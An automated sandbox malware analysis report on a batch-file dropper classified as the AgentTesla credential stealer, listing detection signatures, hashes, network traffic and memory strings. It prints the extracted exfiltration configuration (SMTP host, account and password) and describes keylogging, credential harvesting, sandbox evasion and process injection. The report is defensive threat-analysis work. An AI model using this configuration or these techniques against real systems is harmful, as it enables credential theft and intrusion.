Windows Analysis Report
ilZhNx3JAc.bat

Overview

General Information

Sample name: ilZhNx3JAc.bat
renamed because original name is a hash value
Original sample name: 45a4bc99c532b7f256e58501fe36a809d3bcd530fe6543de7de77d0db7902c98.bat
Analysis ID: 1545586
MD5: 9884d4c89fcd9016a1af1f7ce48d4604
SHA1: 8e7a81d398a10f3c1a4783932f85613570fee73f
SHA256: 45a4bc99c532b7f256e58501fe36a809d3bcd530fe6543de7de77d0db7902c98
Tags: AgentTeslabatuser-NDA0E
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Found large BAT file
Injects a PE file into a foreign processes
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

AV Detection
barindex
Found malware configuration
Source: 8.2.InstallUtil.exe.7a0000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08A9B679h 7_2_08A9B837
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08A9AF14h 7_2_08A9AEA0
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08A9AF14h 7_2_08A9AEB0
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08A9B679h 7_2_08A9B609
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08A9B679h 7_2_08A9B618
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_08AA8838
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_08AA8830
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08AA3C58h 7_2_08AA3BA0
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08AA3C58h 7_2_08AA3B98
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then jmp 08AA9FD7h 7_2_08AA9D78
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 7_2_08C7D598
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 16_2_0891D598

Networking
barindex
Yara detected Generic Downloader
Source: Yara match File source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49740 -> 163.44.198.71:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 163.44.198.71 163.44.198.71
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View ASN Name: GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Source: unknown DNS query: name: ip-api.com
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.7:49740 -> 163.44.198.71:587
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: nffplp.com
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: InstallUtil.exe, 00000008.00000002.1533228561.0000000004DF3000.00000004.00000020.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: MustFlush.bat.Dmf, 00000010.00000002.1583372523.0000000006D10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3804053354.0000000000C37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
Source: InstallUtil.exe, 00000008.00000002.1517390065.0000000002691000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1517390065.0000000002691000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: InstallUtil.exe, 00000012.00000002.3802503434.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting-
Source: InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting1
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nffplp.com
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005709000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3804053354.0000000000C37000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000046A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1517390065.0000000002691000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: MustFlush.bat.Dmf, 00000010.00000002.1583372523.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.dyn.com/
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000046A1000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004651000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005709000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, POq2Ux.cs .Net Code: mDt2FXita0Y
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Spam, unwanted Advertisements and Ransom Demands
barindex
Reads the Security eventlog
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security Jump to behavior
